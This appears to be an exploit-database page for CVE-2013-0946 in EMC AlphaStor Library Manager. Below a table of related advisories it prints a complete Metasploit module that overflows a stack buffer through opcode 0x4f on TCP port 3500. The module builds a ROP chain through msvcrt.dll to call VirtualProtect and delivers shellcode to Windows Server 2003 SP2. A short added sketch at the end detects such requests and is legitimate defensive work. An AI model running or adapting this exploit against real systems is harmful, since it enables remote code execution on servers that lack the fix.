| Title | Published | Views | Reporter |
|---|---|---|---|
| EMC AlphaStor Library Control Program Multiple Buffer Overflows (CVE-2013-0946) | 2 Jun 2013 00:00 | – | checkpoint_advisories |
| EMC AlphaStor Library Control Program Multiple Buffer Overflows (CVE-2013-0946) | 25 Aug 2013 00:00 | – | checkpoint_advisories |
| CVE-2013-0946 | 10 May 2013 10:00 | – | cve |
| CVE-2013-0946 | 10 May 2013 10:00 | – | cvelist |
| EMC AlphaStor Library Manager 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit) | 14 Sep 2017 00:00 | – | exploitpack |
| CVE-2013-0946 | 10 May 2013 11:42 | – | nvd |
| EMC AlphaStor Library Manager Opcode 0x4f Buffer Overflow | 14 Sep 2017 00:00 | – | packetstorm |
| Buffer overflow | 10 May 2013 11:42 | – | prion |
| ESA-2013-037: EMC AlphaStor Buffer Overflow Vulnerability | 10 May 2013 00:00 | – | securityvulns |
| EMC AlphaStor buffer overflow | 10 May 2013 00:00 | – | securityvulns |

```ruby
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'EMC AlphaStor Library Manager Opcode 0x4f',
      'Description' => %q{
        This module exploits a stack based buffer overflow found in EMC
        Alphastor Library Manager version < 4.0 build 910. The overflow
        is triggered due to a lack of sanitization of the pointers used
        for two strcpy functions.
      },
      'Author' => [ 'james fitts' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ],
          [ 'CVE', '2013-0946' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'wfsdelay' => 1000
        },
      'Privileged' => true,
      'Payload' =>
        {
          'Space' => 160,
          'DisableNops' => 'true',
          'BadChars' => "\x00\x09\x0a\x0d",
          'StackAdjustment' => -404,
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'Compat' =>
            {
              'SymbolLookup' => 'ws2ord',
            },
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'Windows Server 2003 SP2 EN',
            {
              # msvcrt.dll
              # add esp, 0c/ retn
              'Ret' => 0x77bdda70,
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Feb 13 2014'))

    register_options(
      [
        Opt::RPORT(3500)
      ], self.class )
  end

  def exploit
    connect

    p = "\x90" * 8
    p << payload.encoded

    # msvcrt.dll
    # 96 bytes
    rop = [
      0x77bb2563, # pop eax/ retn
      0x77ba1114, # ptr to kernel32!virtualprotect
      0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
      0xfeedface,
      0x77bb0c86, # xchg eax, esi/ retn
      0x77bc9801, # pop ebp/ retn
      0x77be2265,
      0x77bb2563, # pop eax/ retn
      0x03C0990F,
      0x77bdd441, # sub eax, 3c0940fh/ retn
      0x77bb48d3, # pop eax/ retn
      0x77bf21e0,
      0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
      0x77bbfc02, # pop ecx/ retn
      0x77bef001,
      0x77bd8c04, # pop edi/ retn
      0x77bd8c05,
      0x77bb2563, # pop eax/ retn
      0x03c0984f,
      0x77bdd441, # sub eax, 3c0940fh/ retn
      0x77bb8285, # xchg eax, edx/ retn
      0x77bb2563, # pop eax/ retn
      0x90909090,
      0x77be6591, # pushad/ add al, 0efh/ retn
    ].pack("V*")

    buf = Rex::Text.pattern_create(514)
    buf[0, 2] = "O~" # opcode
    buf[13, 4] = [0x77bdf444].pack('V') # stack pivot 52
    buf[25, 4] = [target.ret].pack('V') # stack pivot 12
    buf[41, 4] = [0x77bdf444].pack('V') # stack pivot 52
    buf[57, 4] = [0x01167e20].pack('V') # ptr
    buf[69, rop.length] = rop
    buf[165, 4] = [0x909073eb].pack('V') # jmp $+117
    buf[278, 4] = [0x0116fd59].pack('V') # ptr
    buf[282, p.length] = p
    buf[512, 1] = "\x00"

    # junk
    buf << "AAAA"
    buf << "BBBB"
    buf << "CCCC"
    buf << "DDDD"

    print_status("Trying target %s..." % target.name)
    sock.put(buf)

    handler
    disconnect
  end
end
```
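
A defender-side check derived from the request layout in the module above, as an added example that is not part of the original module or of Metasploit: it flags requests to TCP/3500 that start with opcode 0x4f and are oversized, carry non-printable bytes before the first NUL, or contain a run of 0x90 bytes. The function name, the 256-byte limit, the assumption that benign requests are printable text, and both sample payloads are constructed for illustration.

```ruby
# Added defender-side sketch; not part of the Metasploit module above.
# Assumptions to tune against real traffic: benign opcode 0x4f requests are
# short printable strings, and MAX_LEN is a placeholder limit.
ALPHASTOR_PORT = 3500               # RPORT registered by the module
OPCODE_4F      = 0x4f               # first request byte ("O")
MAX_LEN        = 256                # assumed ceiling for a benign request
NOP_RUN        = ("\x90" * 8).b     # padding placed before the payload

# Returns the reasons a captured request looks like an overflow attempt;
# an empty array means nothing stood out.
def inspect_request(dst_port, payload)
  bytes = payload.b
  return [] unless dst_port == ALPHASTOR_PORT
  return [] unless bytes.getbyte(0) == OPCODE_4F

  reasons = []
  if bytes.bytesize > MAX_LEN
    reasons << "length #{bytes.bytesize} exceeds #{MAX_LEN}"
  end

  # strcpy stops at the first NUL, so only the bytes before it get copied.
  body = bytes.byteslice(1, bytes.bytesize)
  copied = body.byteslice(0, body.index("\x00".b) || body.bytesize)
  odd = copied.each_byte.count { |c| c < 0x20 || c > 0x7e }
  reasons << "#{odd} non-printable bytes before first NUL" if odd > 0

  reasons << "run of 8 or more 0x90 bytes" if bytes.include?(NOP_RUN)
  reasons
end

# Constructed samples (not captured traffic, not the real request format).
BENIGN     = "O~status\x00".b
SUSPICIOUS = ("O~" + "A" * 400 + "\x90" * 8 + "\x00").b

if __FILE__ == $PROGRAM_NAME
  puts inspect_request(3500, BENIGN).inspect
  puts inspect_request(3500, SUSPICIOUS)
end
```

The three heuristics are independent, so each can be enabled or given its own threshold once baseline traffic for the service has been observed.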